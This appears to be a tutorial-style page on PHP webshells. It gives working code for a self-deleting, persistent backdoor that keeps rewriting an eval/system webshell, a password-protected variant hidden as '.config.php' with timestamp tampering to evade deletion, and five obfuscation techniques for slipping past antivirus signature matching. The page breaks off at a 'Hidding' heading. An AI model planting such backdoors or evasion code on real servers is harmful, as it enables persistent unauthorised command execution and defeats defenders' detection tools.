Webshell

PHP Backdoor

Here is a PHP backdoor that is extremely hard to delete:

<?php
    // Let the script keeps executing even if client disconnects
    ignore_user_abort(true);
    // Disable script execution time limitation
    set_time_limit(0);
    // Delete this file iteself
    unlink(__FILE__);

    $file = 'shell.php';
    $code = '<?php @eval($_POST["cmd"]);?>';

    // Keep writing PHP one-liner backdoor into the file
    while (1) {
        file_put_contents($file, $code);
        usleep(5000);
    }
?>

It deletes itself by calling unlink(__FILE__) and then keep writing the webshell code into shell.php. An improved version of this backdoor is adding a password in case someone else uses it:

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);

    // Let the webshell be a hidden file
    $file = '/var/www/dvwa/.config.php';
    // password="super_secret_password"
    $code = '<?php if(md5($_POST["pass"])=="a444f0a46019465ed8eb7f42548e6a0f"){@system($_POST[a]);}?>';
    
    while (1) {
        file_put_contents($file, $code);
        // Modify the timestamp to bypass deletion bash script
        system('touch -m -d "2022-04-25 12:14:32" .config.php');
        usleep(5000);
    }
?>

Antivirus Bypass

Suppose antivirus software matches <?assert($_REQUEST[;?> and <?eval($_REQUEST[;?>. If these two patterns are found, then the webshell is detected and deleted. Our objective is to achieve the same functionality without using these two patterns directly.

Idea 1: Define a constant

<?php define("a","$_REQUEST[cmd]");eval(a);?>

Idea 2: Define a function

<?php
function a($a)
{
    return $a;
}
eval(a($_REQUEST)['cmd']);
?>

Idea 3: Define a class

<?php
class User
{
    public $name='';
    function __destruct()
    {
        eval("$this->name");
    }
$user=new User;
$user->name=''.$_REQUEST['cmd'];
}

Idea 4: Parameter

<?php
$COOKIE=$_COOKIE;
foreach($COOKIE as $key=>$value)
{
    if($key=='assert')
    {
        $key($_REQUEST['cmd']);
    }
}

Idea 5: get_defined_functions()

<?php
$a=get_defined_functions();
$a['internal'][841]($_REQUEST['cmd']);

Hidding